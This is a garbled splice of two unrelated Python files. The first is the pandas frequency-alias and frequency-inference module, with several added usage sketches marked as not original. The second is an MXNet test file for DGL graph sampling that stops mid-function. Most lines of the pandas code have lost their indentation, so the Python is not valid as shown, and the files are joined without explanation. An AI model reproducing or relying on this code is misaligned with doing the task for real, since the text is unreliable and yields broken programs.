#: cache of previously seen offsets
_offset_map = {}
_offset_to_period_map = {
'WEEKDAY': 'D',
'EOM': 'M',
'BM': 'M',
'BQS': 'Q',
'QS': 'Q',
'BQ': 'Q',
'BA': 'A',
'AS': 'A',
'BAS': 'A',
'MS': 'M',
'D': 'D',
'C': 'C',
'B': 'B',
'T': 'T',
'S': 'S',
'L': 'L',
'U': 'U',
'N': 'N',
'H': 'H',
'Q': 'Q',
'A': 'A',
'W': 'W',
'M': 'M'
}
need_suffix = ['QS', 'BQ', 'BQS', 'AS', 'BA', 'BAS']
_months = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP',
'OCT', 'NOV', 'DEC']
for __prefix in need_suffix:
for _m in _months:
_offset_to_period_map['%s-%s' % (__prefix, _m)] = \
_offset_to_period_map[__prefix]
for __prefix in ['A', 'Q']:
for _m in _months:
_alias = '%s-%s' % (__prefix, _m)
_offset_to_period_map[_alias] = _alias
_days = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
for _d in _days:
_offset_to_period_map['W-%s' % _d] = 'W-%s' % _d
def get_period_alias(offset_str):
""" alias to closest period strings BQ->Q etc"""
return _offset_to_period_map.get(offset_str, None)
_rule_aliases = {
# Legacy rules that will continue to map to their original values
# essentially for the rest of time
'WEEKDAY': 'B',
'EOM': 'BM',
'W@MON': 'W-MON',
'W@TUE': 'W-TUE',
'W@WED': 'W-WED',
'W@THU': 'W-THU',
'W@FRI': 'W-FRI',
'W@SAT': 'W-SAT',
'W@SUN': 'W-SUN',
'W': 'W-SUN',
'Q@JAN': 'BQ-JAN',
'Q@FEB': 'BQ-FEB',
'Q@MAR': 'BQ-MAR',
'Q': 'Q-DEC',
'A': 'A-DEC', # YearEnd(month=12),
'AS': 'AS-JAN', # YearBegin(month=1),
'BA': 'BA-DEC', # BYearEnd(month=12),
'BAS': 'BAS-JAN', # BYearBegin(month=1),
'A@JAN': 'BA-JAN',
'A@FEB': 'BA-FEB',
'A@MAR': 'BA-MAR',
'A@APR': 'BA-APR',
'A@MAY': 'BA-MAY',
'A@JUN': 'BA-JUN',
'A@JUL': 'BA-JUL',
'A@AUG': 'BA-AUG',
'A@SEP': 'BA-SEP',
'A@OCT': 'BA-OCT',
'A@NOV': 'BA-NOV',
'A@DEC': 'BA-DEC',
# lite aliases
'Min': 'T',
'min': 'T',
'ms': 'L',
'us': 'U'
}
#TODO: Can this be killed?
for _i, _weekday in enumerate(['MON', 'TUE', 'WED', 'THU', 'FRI']):
for _iweek in range(4):
_name = 'WOM-%d%s' % (_iweek + 1, _weekday)
_rule_aliases[_name.replace('-', '@')] = _name
# Note that _rule_aliases is not 1:1 (d[BA]==d[A@DEC]), and so traversal
# order matters when constructing an inverse. we pick one. #2331
_legacy_reverse_map = dict((v, k) for k, v in
reversed(sorted(compat.iteritems(_rule_aliases))))
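# Illustration: both 'BA' and 'A@DEC' alias to 'BA-DEC'; iterating the sorted
# items in reverse means the alphabetically-smallest key is assigned last, so
# _legacy_reverse_map['BA-DEC'] == 'A@DEC'.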
def to_offset(freqstr):
"""
Return DateOffset object from string representation
Examples
--------
>>> to_offset('5Min')
Minute(5)
"""
if freqstr is None:
return None
if isinstance(freqstr, DateOffset):
return freqstr
if isinstance(freqstr, tuple):
name = freqstr[0]
stride = freqstr[1]
if isinstance(stride, compat.string_types):
name, stride = stride, name
name, _ = _base_and_stride(name)
delta = get_offset(name) * stride
else:
delta = None
stride_sign = None
try:
for stride, name, _ in opattern.findall(freqstr):
offset = get_offset(name)
if stride_sign is None:
stride_sign = -1 if stride.startswith('-') else 1
if not stride:
stride = 1
stride = int(stride)
offset = offset * int(np.fabs(stride) * stride_sign)
if delta is None:
delta = offset
else:
delta = delta + offset
except Exception:
raise ValueError("Could not evaluate %s" % freqstr)
if delta is None:
raise ValueError('Unable to understand %s as a frequency' % freqstr)
return delta
# hack to handle WOM-1MON
opattern = re.compile(r'([\-]?\d*)\s*([A-Za-z]+([\-@][\dA-Za-z\-]+)?)')
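# Illustrative usage sketch (not part of the original module): to_offset also
# handles compound strings; every (stride, name) pair matched by ``opattern``
# becomes an offset and the pieces are summed into a single DateOffset.
def _example_to_offset_compound():
    assert to_offset('5T') == Minute(5)
    assert to_offset('2D') == 2 * Day()
    # '1H30T' is parsed as Hour(1) followed by Minute(30), then summed
    assert to_offset('1H30T') == Hour(1) + Minute(30)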
def _base_and_stride(freqstr):
"""
Return base freq and stride info from string representation
Examples
--------
    _base_and_stride('5Min') -> ('Min', 5)
"""
groups = opattern.match(freqstr)
if not groups:
raise ValueError("Could not evaluate %s" % freqstr)
stride = groups.group(1)
if len(stride):
stride = int(stride)
else:
stride = 1
base = groups.group(2)
return (base, stride)
def get_base_alias(freqstr):
"""
Returns the base frequency alias, e.g., '5D' -> 'D'
"""
return _base_and_stride(freqstr)[0]
_dont_uppercase = set(('MS', 'ms'))
def get_offset(name):
"""
Return DateOffset object associated with rule name
Examples
--------
get_offset('EOM') --> BMonthEnd(1)
"""
if name not in _dont_uppercase:
name = name.upper()
if name in _rule_aliases:
name = _rule_aliases[name]
elif name.lower() in _rule_aliases:
name = _rule_aliases[name.lower()]
else:
if name in _rule_aliases:
name = _rule_aliases[name]
if name not in _offset_map:
try:
# generate and cache offset
offset = _make_offset(name)
except (ValueError, TypeError, KeyError):
# bad prefix or suffix
raise ValueError('Bad rule name requested: %s.' % name)
_offset_map[name] = offset
return _offset_map[name]
getOffset = get_offset
def get_offset_name(offset):
"""
Return rule name associated with a DateOffset object
Examples
--------
get_offset_name(BMonthEnd(1)) --> 'EOM'
"""
if offset is None:
raise ValueError("Offset can't be none!")
# Hack because this is what it did before...
if isinstance(offset, BDay):
if offset.n != 1:
raise ValueError('Bad rule given: %s.' % 'BusinessDays')
else:
return offset.rule_code
try:
return offset.freqstr
except AttributeError:
# Bad offset, give useful error.
raise ValueError('Bad rule given: %s.' % offset)
def get_legacy_offset_name(offset):
"""
Return the pre pandas 0.8.0 name for the date offset
"""
name = offset.name
return _legacy_reverse_map.get(name, name)
def get_standard_freq(freq):
"""
Return the standardized frequency string
"""
if freq is None:
return None
if isinstance(freq, DateOffset):
return get_offset_name(freq)
code, stride = get_freq_code(freq)
return _get_freq_str(code, stride)
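# Illustrative usage sketch (not part of the original module): legacy and
# lowercase aliases are normalized to the canonical '<mult><code>' spelling.
def _example_get_standard_freq():
    assert get_standard_freq('5min') == '5T'
    assert get_standard_freq('Q') == 'Q-DEC'
    assert get_standard_freq(None) is None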
#----------------------------------------------------------------------
# Period codes
# period frequency constants corresponding to scikits timeseries
# originals
_period_code_map = {
# Annual freqs with various fiscal year ends.
# eg, 2005 for A-FEB runs Mar 1, 2004 to Feb 28, 2005
"A-DEC": 1000, # Annual - December year end
"A-JAN": 1001, # Annual - January year end
"A-FEB": 1002, # Annual - February year end
"A-MAR": 1003, # Annual - March year end
"A-APR": 1004, # Annual - April year end
"A-MAY": 1005, # Annual - May year end
"A-JUN": 1006, # Annual - June year end
"A-JUL": 1007, # Annual - July year end
"A-AUG": 1008, # Annual - August year end
"A-SEP": 1009, # Annual - September year end
"A-OCT": 1010, # Annual - October year end
"A-NOV": 1011, # Annual - November year end
# Quarterly frequencies with various fiscal year ends.
# eg, Q42005 for Q-OCT runs Aug 1, 2005 to Oct 31, 2005
"Q-DEC": 2000, # Quarterly - December year end
"Q-JAN": 2001, # Quarterly - January year end
"Q-FEB": 2002, # Quarterly - February year end
"Q-MAR": 2003, # Quarterly - March year end
"Q-APR": 2004, # Quarterly - April year end
"Q-MAY": 2005, # Quarterly - May year end
"Q-JUN": 2006, # Quarterly - June year end
"Q-JUL": 2007, # Quarterly - July year end
"Q-AUG": 2008, # Quarterly - August year end
"Q-SEP": 2009, # Quarterly - September year end
"Q-OCT": 2010, # Quarterly - October year end
"Q-NOV": 2011, # Quarterly - November year end
"M": 3000, # Monthly
"W-SUN": 4000, # Weekly - Sunday end of week
"W-MON": 4001, # Weekly - Monday end of week
"W-TUE": 4002, # Weekly - Tuesday end of week
"W-WED": 4003, # Weekly - Wednesday end of week
"W-THU": 4004, # Weekly - Thursday end of week
"W-FRI": 4005, # Weekly - Friday end of week
"W-SAT": 4006, # Weekly - Saturday end of week
"B": 5000, # Business days
"D": 6000, # Daily
"H": 7000, # Hourly
"T": 8000, # Minutely
"S": 9000, # Secondly
"L": 10000, # Millisecondly
"U": 11000, # Microsecondly
"N": 12000, # Nanosecondly
}
_reverse_period_code_map = {}
for _k, _v in compat.iteritems(_period_code_map):
_reverse_period_code_map[_v] = _k
# Additional aliases
_period_code_map.update({
"Q": 2000, # Quarterly - December year end (default quarterly)
"A": 1000, # Annual
"W": 4000, # Weekly
})
def _period_alias_dictionary():
"""
Build freq alias dictionary to support freqs from original c_dates.c file
of the scikits.timeseries library.
"""
alias_dict = {}
M_aliases = ["M", "MTH", "MONTH", "MONTHLY"]
B_aliases = ["B", "BUS", "BUSINESS", "BUSINESSLY", 'WEEKDAY']
D_aliases = ["D", "DAY", "DLY", "DAILY"]
H_aliases = ["H", "HR", "HOUR", "HRLY", "HOURLY"]
T_aliases = ["T", "MIN", "MINUTE", "MINUTELY"]
S_aliases = ["S", "SEC", "SECOND", "SECONDLY"]
L_aliases = ["L", "ms", "MILLISECOND", "MILLISECONDLY"]
U_aliases = ["U", "US", "MICROSECOND", "MICROSECONDLY"]
N_aliases = ["N", "NS", "NANOSECOND", "NANOSECONDLY"]
for k in M_aliases:
alias_dict[k] = 'M'
for k in B_aliases:
alias_dict[k] = 'B'
for k in D_aliases:
alias_dict[k] = 'D'
for k in H_aliases:
alias_dict[k] = 'H'
for k in T_aliases:
alias_dict[k] = 'Min'
for k in S_aliases:
alias_dict[k] = 'S'
for k in L_aliases:
alias_dict[k] = 'L'
for k in U_aliases:
alias_dict[k] = 'U'
for k in N_aliases:
alias_dict[k] = 'N'
A_prefixes = ["A", "Y", "ANN", "ANNUAL", "ANNUALLY", "YR", "YEAR",
"YEARLY"]
Q_prefixes = ["Q", "QTR", "QUARTER", "QUARTERLY", "Q-E",
"QTR-E", "QUARTER-E", "QUARTERLY-E"]
month_names = [
["DEC", "DECEMBER"],
["JAN", "JANUARY"],
["FEB", "FEBRUARY"],
["MAR", "MARCH"],
["APR", "APRIL"],
["MAY", "MAY"],
["JUN", "JUNE"],
["JUL", "JULY"],
["AUG", "AUGUST"],
["SEP", "SEPTEMBER"],
["OCT", "OCTOBER"],
["NOV", "NOVEMBER"]]
seps = ["@", "-"]
for k in A_prefixes:
alias_dict[k] = 'A'
for m_tup in month_names:
for sep in seps:
m1, m2 = m_tup
alias_dict[k + sep + m1] = 'A-' + m1
alias_dict[k + sep + m2] = 'A-' + m1
for k in Q_prefixes:
alias_dict[k] = 'Q'
for m_tup in month_names:
for sep in seps:
m1, m2 = m_tup
alias_dict[k + sep + m1] = 'Q-' + m1
alias_dict[k + sep + m2] = 'Q-' + m1
W_prefixes = ["W", "WK", "WEEK", "WEEKLY"]
day_names = [
["SUN", "SUNDAY"],
["MON", "MONDAY"],
["TUE", "TUESDAY"],
["WED", "WEDNESDAY"],
["THU", "THURSDAY"],
["FRI", "FRIDAY"],
["SAT", "SATURDAY"]]
for k in W_prefixes:
alias_dict[k] = 'W'
for d_tup in day_names:
for sep in ["@", "-"]:
d1, d2 = d_tup
alias_dict[k + sep + d1] = 'W-' + d1
alias_dict[k + sep + d2] = 'W-' + d1
return alias_dict
def _infer_period_group(freqstr):
return _period_group(Resolution._reso_freq_map[freqstr])
def _period_group(freqstr):
base, mult = get_freq_code(freqstr)
return base // 1000 * 1000
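# Illustrative sketch (not part of the original module): period codes are laid
# out in blocks of 1000 per frequency family, so flooring to the nearest
# thousand recovers the family (annual=1000, quarterly=2000, weekly=4000, ...).
def _example_period_group():
    assert _period_group('A-MAR') == 1000
    assert _period_group('Q-JAN') == 2000
    assert _period_group('W-WED') == 4000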
_period_alias_dict = _period_alias_dictionary()
def _period_str_to_code(freqstr):
# hack
freqstr = _rule_aliases.get(freqstr, freqstr)
if freqstr not in _dont_uppercase:
freqstr = _rule_aliases.get(freqstr.lower(), freqstr)
try:
if freqstr not in _dont_uppercase:
freqstr = freqstr.upper()
return _period_code_map[freqstr]
except KeyError:
try:
alias = _period_alias_dict[freqstr]
except KeyError:
raise ValueError("Unknown freqstr: %s" % freqstr)
return _period_code_map[alias]
def infer_freq(index, warn=True):
"""
Infer the most likely frequency given the input index. If the frequency is
uncertain, a warning will be printed
Parameters
----------
index : DatetimeIndex
if passed a Series will use the values of the series (NOT THE INDEX)
warn : boolean, default True
Returns
-------
freq : string or None
None if no discernible frequency
TypeError if the index is not datetime-like
"""
import pandas as pd
if isinstance(index, com.ABCSeries):
values = index.values
        if not (com.is_datetime64_dtype(values) or
                com.is_timedelta64_dtype(values) or
                values.dtype == object):
            raise TypeError("cannot infer freq from a non-convertible dtype "
                            "on a Series of {0}".format(index.dtype))
index = values
if com.is_period_arraylike(index):
raise TypeError("PeriodIndex given. Check the `freq` attribute "
"instead of using infer_freq.")
elif isinstance(index, pd.TimedeltaIndex):
inferer = _TimedeltaFrequencyInferer(index, warn=warn)
return inferer.get_freq()
if isinstance(index, pd.Index) and not isinstance(index, pd.DatetimeIndex):
if isinstance(index, (pd.Int64Index, pd.Float64Index)):
raise TypeError("cannot infer freq from a non-convertible index type {0}".format(type(index)))
index = index.values
index = pd.DatetimeIndex(index)
inferer = _FrequencyInferer(index, warn=warn)
return inferer.get_freq()
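# Illustrative usage sketch (not part of the original module, assumes pandas
# is importable): a regular index infers its rule back; indexes with fewer
# than three points raise ValueError inside _FrequencyInferer.
def _example_infer_freq():
    import pandas as pd
    assert infer_freq(pd.date_range('2000-01-03', periods=10, freq='B')) == 'B'
    assert infer_freq(pd.date_range('2000-01-01', periods=12, freq='H')) == 'H'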
_ONE_MICRO = long(1000)
_ONE_MILLI = _ONE_MICRO * 1000
_ONE_SECOND = _ONE_MILLI * 1000
_ONE_MINUTE = 60 * _ONE_SECOND
_ONE_HOUR = 60 * _ONE_MINUTE
_ONE_DAY = 24 * _ONE_HOUR
class _FrequencyInferer(object):
"""
Not sure if I can avoid the state machine here
"""
def __init__(self, index, warn=True):
self.index = index
self.values = np.asarray(index).view('i8')
        # This moves the values, which are implicitly in UTC, to the
        # index's timezone so they are in local time
if hasattr(index,'tz'):
if index.tz is not None:
self.values = tslib.tz_convert(self.values, 'UTC', index.tz)
self.warn = warn
if len(index) < 3:
raise ValueError('Need at least 3 dates to infer frequency')
self.is_monotonic = self.index.is_monotonic
@cache_readonly
def deltas(self):
return tslib.unique_deltas(self.values)
@cache_readonly
def deltas_asi8(self):
return tslib.unique_deltas(self.index.asi8)
@cache_readonly
def is_unique(self):
return len(self.deltas) == 1
@cache_readonly
def is_unique_asi8(self):
return len(self.deltas_asi8) == 1
def get_freq(self):
if not self.is_monotonic or not self.index.is_unique:
return None
delta = self.deltas[0]
if _is_multiple(delta, _ONE_DAY):
return self._infer_daily_rule()
else:
# Possibly intraday frequency. Here we use the
# original .asi8 values as the modified values
# will not work around DST transitions. See #8772
if not self.is_unique_asi8:
return None
delta = self.deltas_asi8[0]
if _is_multiple(delta, _ONE_HOUR):
# Hours
return _maybe_add_count('H', delta / _ONE_HOUR)
elif _is_multiple(delta, _ONE_MINUTE):
# Minutes
return _maybe_add_count('T', delta / _ONE_MINUTE)
elif _is_multiple(delta, _ONE_SECOND):
# Seconds
return _maybe_add_count('S', delta / _ONE_SECOND)
elif _is_multiple(delta, _ONE_MILLI):
# Milliseconds
return _maybe_add_count('L', delta / _ONE_MILLI)
elif _is_multiple(delta, _ONE_MICRO):
# Microseconds
return _maybe_add_count('U', delta / _ONE_MICRO)
else:
# Nanoseconds
return _maybe_add_count('N', delta)
@cache_readonly
def day_deltas(self):
return [x / _ONE_DAY for x in self.deltas]
@cache_readonly
def fields(self):
return tslib.build_field_sarray(self.values)
@cache_readonly
def rep_stamp(self):
return lib.Timestamp(self.values[0])
def month_position_check(self):
# TODO: cythonize this, very slow
calendar_end = True
business_end = True
calendar_start = True
business_start = True
years = self.fields['Y']
months = self.fields['M']
days = self.fields['D']
weekdays = self.index.dayofweek
from calendar import monthrange
for y, m, d, wd in zip(years, months, days, weekdays):
wd = datetime(y, m, d).weekday()
if calendar_start:
calendar_start &= d == 1
if business_start:
business_start &= d == 1 or (d <= 3 and wd == 0)
if calendar_end or business_end:
_, daysinmonth = monthrange(y, m)
cal = d == daysinmonth
if calendar_end:
calendar_end &= cal
if business_end:
business_end &= cal or (daysinmonth - d < 3 and wd == 4)
elif not calendar_start and not business_start:
break
if calendar_end:
return 'ce'
elif business_end:
return 'be'
elif calendar_start:
return 'cs'
elif business_start:
return 'bs'
else:
return None
@cache_readonly
def mdiffs(self):
nmonths = self.fields['Y'] * 12 + self.fields['M']
return tslib.unique_deltas(nmonths.astype('i8'))
@cache_readonly
def ydiffs(self):
return tslib.unique_deltas(self.fields['Y'].astype('i8'))
def _infer_daily_rule(self):
annual_rule = self._get_annual_rule()
if annual_rule:
nyears = self.ydiffs[0]
month = _month_aliases[self.rep_stamp.month]
return _maybe_add_count('%s-%s' % (annual_rule, month), nyears)
quarterly_rule = self._get_quarterly_rule()
if quarterly_rule:
nquarters = self.mdiffs[0] / 3
mod_dict = {0: 12, 2: 11, 1: 10}
month = _month_aliases[mod_dict[self.rep_stamp.month % 3]]
return _maybe_add_count('%s-%s' % (quarterly_rule, month),
nquarters)
monthly_rule = self._get_monthly_rule()
if monthly_rule:
return monthly_rule
if self.is_unique:
days = self.deltas[0] / _ONE_DAY
if days % 7 == 0:
# Weekly
alias = _weekday_rule_aliases[self.rep_stamp.weekday()]
return _maybe_add_count('W-%s' % alias, days / 7)
else:
return _maybe_add_count('D', days)
# Business daily. Maybe
if self.day_deltas == [1, 3]:
return 'B'
wom_rule = self._get_wom_rule()
if wom_rule:
return wom_rule
def _get_annual_rule(self):
if len(self.ydiffs) > 1:
return None
if len(algos.unique(self.fields['M'])) > 1:
return None
pos_check = self.month_position_check()
return {'cs': 'AS', 'bs': 'BAS',
'ce': 'A', 'be': 'BA'}.get(pos_check)
def _get_quarterly_rule(self):
if len(self.mdiffs) > 1:
return None
if not self.mdiffs[0] % 3 == 0:
return None
pos_check = self.month_position_check()
return {'cs': 'QS', 'bs': 'BQS',
'ce': 'Q', 'be': 'BQ'}.get(pos_check)
def _get_monthly_rule(self):
if len(self.mdiffs) > 1:
return None
pos_check = self.month_position_check()
return {'cs': 'MS', 'bs': 'BMS',
'ce': 'M', 'be': 'BM'}.get(pos_check)
def _get_wom_rule(self):
# wdiffs = unique(np.diff(self.index.week))
#We also need -47, -49, -48 to catch index spanning year boundary
# if not lib.ismember(wdiffs, set([4, 5, -47, -49, -48])).all():
# return None
weekdays = unique(self.index.weekday)
if len(weekdays) > 1:
return None
week_of_months = unique((self.index.day - 1) // 7)
if len(week_of_months) > 1:
return None
# get which week
week = week_of_months[0] + 1
wd = _weekday_rule_aliases[weekdays[0]]
return 'WOM-%d%s' % (week, wd)
import pandas.core.algorithms as algos
class _TimedeltaFrequencyInferer(_FrequencyInferer):
def _infer_daily_rule(self):
if self.is_unique:
days = self.deltas[0] / _ONE_DAY
if days % 7 == 0:
# Weekly
alias = _weekday_rule_aliases[self.rep_stamp.weekday()]
return _maybe_add_count('W-%s' % alias, days / 7)
else:
return _maybe_add_count('D', days)
def _maybe_add_count(base, count):
if count > 1:
return '%d%s' % (count, base)
else:
return base
def is_subperiod(source, target):
"""
Returns True if downsampling is possible between source and target
frequencies
Parameters
----------
source : string
Frequency converting from
target : string
Frequency converting to
Returns
-------
is_subperiod : boolean
"""
if isinstance(source, offsets.DateOffset):
source = source.rule_code
if isinstance(target, offsets.DateOffset):
target = target.rule_code
target = target.upper()
source = source.upper()
if _is_annual(target):
if _is_quarterly(source):
return _quarter_months_conform(_get_rule_month(source),
_get_rule_month(target))
return source in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_quarterly(target):
return source in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'M':
return source in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_weekly(target):
return source in [target, 'D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'B':
return source in ['B', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'C':
return source in ['C', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'D':
return source in ['D', 'H', 'T', 'S', 'L', 'U', 'N']
elif target == 'H':
return source in ['H', 'T', 'S', 'L', 'U', 'N']
elif target == 'T':
return source in ['T', 'S', 'L', 'U', 'N']
elif target == 'S':
return source in ['S', 'L', 'U', 'N']
elif target == 'L':
return source in ['L', 'U', 'N']
elif target == 'U':
return source in ['U', 'N']
elif target == 'N':
return source in ['N']
def is_superperiod(source, target):
"""
Returns True if upsampling is possible between source and target
frequencies
Parameters
----------
source : string
Frequency converting from
target : string
Frequency converting to
Returns
-------
is_superperiod : boolean
"""
if isinstance(source, offsets.DateOffset):
source = source.rule_code
if isinstance(target, offsets.DateOffset):
target = target.rule_code
target = target.upper()
source = source.upper()
if _is_annual(source):
if _is_annual(target):
return _get_rule_month(source) == _get_rule_month(target)
if _is_quarterly(target):
smonth = _get_rule_month(source)
tmonth = _get_rule_month(target)
return _quarter_months_conform(smonth, tmonth)
return target in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_quarterly(source):
return target in ['D', 'C', 'B', 'M', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'M':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif _is_weekly(source):
return target in [source, 'D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'B':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'C':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'D':
return target in ['D', 'C', 'B', 'H', 'T', 'S', 'L', 'U', 'N']
elif source == 'H':
return target in ['H', 'T', 'S', 'L', 'U', 'N']
elif source == 'T':
return target in ['T', 'S', 'L', 'U', 'N']
elif source == 'S':
return target in ['S', 'L', 'U', 'N']
elif source == 'L':
return target in ['L', 'U', 'N']
elif source == 'U':
return target in ['U', 'N']
elif source == 'N':
return target in ['N']
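# Illustrative usage sketch (not part of the original module): daily data can
# be downsampled to monthly but not the other way around, and annual vs.
# quarterly frequencies must agree on the fiscal month modulo a quarter.
def _example_sub_super_period():
    assert is_subperiod('D', 'M')
    assert not is_subperiod('M', 'D')
    assert is_superperiod('A-DEC', 'Q-MAR')
    assert not is_superperiod('A-DEC', 'Q-FEB')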
def _get_rule_month(source, default='DEC'):
source = source.upper()
if '-' not in source:
return default
else:
return source.split('-')[1]
def _is_annual(rule):
rule = rule.upper()
return rule == 'A' or rule.startswith('A-')
def _quarter_months_conform(source, target):
snum = _month_numbers[source]
tnum = _month_numbers[target]
return snum % 3 == tnum % 3
def _is_quarterly(rule):
rule = rule.upper()
return rule == 'Q' or rule.startswith('Q-')
def _is_weekly(rule):
rule = rule.upper()
return rule == 'W' or rule.startswith('W-')
DAYS = ['MON', 'TUE', 'WED', 'THU', 'FRI', 'SAT', 'SUN']
MONTHS = ['JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL',
'AUG', 'SEP', 'OCT', 'NOV', 'DEC']
_month_numbers = dict((k, i) for i, k in enumerate(MONTHS))
_weekday_rule_aliases = dict((k, v) for k, v in enumerate(DAYS))
_month_aliases = dict((k + 1, v) for k, v in enumerate(MONTHS))
def _is_multiple(us, mult):
return us % mult == 0
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
import numpy as np
import scipy as sp
import mxnet as mx
import random
import itertools
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
import unittest
def check_uniform(out, num_hops, max_num_vertices):
sample_id = out[0]
sub_csr = out[1]
layer = out[2]
# check sample_id
assert (len(sample_id) == max_num_vertices+1)
num_vertices = sample_id[-1].asnumpy()[0]
# check sub_csr
sub_csr.check_format(full_check=True)
assert np.all((sub_csr.indptr[num_vertices:] == sub_csr.indptr[num_vertices]).asnumpy())
# check layer
for data in layer[:num_vertices]:
assert(data <= num_hops)
def check_non_uniform(out, num_hops, max_num_vertices):
sample_id = out[0]
sub_csr = out[1]
prob = out[2]
layer = out[3]
# check sample_id
assert (len(sample_id) == max_num_vertices+1)
num_vertices = sample_id[-1].asnumpy()[0]
# check sub_csr
sub_csr.check_format(full_check=True)
assert np.all((sub_csr.indptr[num_vertices:] == sub_csr.indptr[num_vertices]).asnumpy())
# check prob
assert (len(prob) == max_num_vertices)
# check layer
for data in layer[:num_vertices]:
assert(data <= num_hops)
def check_compact(csr, id_arr, num_nodes):
compact = mx.nd.contrib.dgl_graph_compact(csr, id_arr, graph_sizes=num_nodes, return_mapping=False)
assert compact.shape[0] == num_nodes
assert compact.shape[1] == num_nodes
assert mx.nd.sum(compact.indptr == csr.indptr[0:(num_nodes + 1)]).asnumpy() == num_nodes + 1
sub_indices = compact.indices.asnumpy()
indices = csr.indices.asnumpy()
id_arr = id_arr.asnumpy()
for i in range(len(sub_indices)):
sub_id = sub_indices[i]
assert id_arr[sub_id] == indices[i]
def test_uniform_sample():
shape = (5, 5)
data_np = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20], dtype=np.int64)
indices_np = np.array([1,2,3,4,0,2,3,4,0,1,3,4,0,1,2,4,0,1,2,3], dtype=np.int64)
indptr_np = np.array([0,4,8,12,16,20], dtype=np.int64)
a = mx.nd.sparse.csr_matrix((data_np, indices_np, indptr_np), shape=shape)
seed = mx.nd.array([0,1,2,3,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=1, max_num_vertices=4)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=4)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=2, num_neighbor=1, max_num_vertices=3)
assert (len(out) == 3)
check_uniform(out, num_hops=2, max_num_vertices=3)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,2,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=2, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=2, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_uniform_sample(a, seed, num_args=2, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 3)
check_uniform(out, num_hops=1, max_num_vertices=5)
num_nodes = out[0][-1].asnumpy()
assert num_nodes > 0
assert num_nodes < len(out[0])
check_compact(out[1], out[0], num_nodes)
def test_non_uniform_sample():
shape = (5, 5)
prob = mx.nd.array([0.9, 0.8, 0.2, 0.4, 0.1], dtype=np.float32)
data_np = np.array([1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20], dtype=np.int64)
indices_np = np.array([1,2,3,4,0,2,3,4,0,1,3,4,0,1,2,4,0,1,2,3], dtype=np.int64)
indptr_np = np.array([0,4,8,12,16,20], dtype=np.int64)
a = mx.nd.sparse.csr_matrix((data_np, indices_np, indptr_np), shape=shape)
seed = mx.nd.array([0,1,2,3,4], dtype=np.int64)
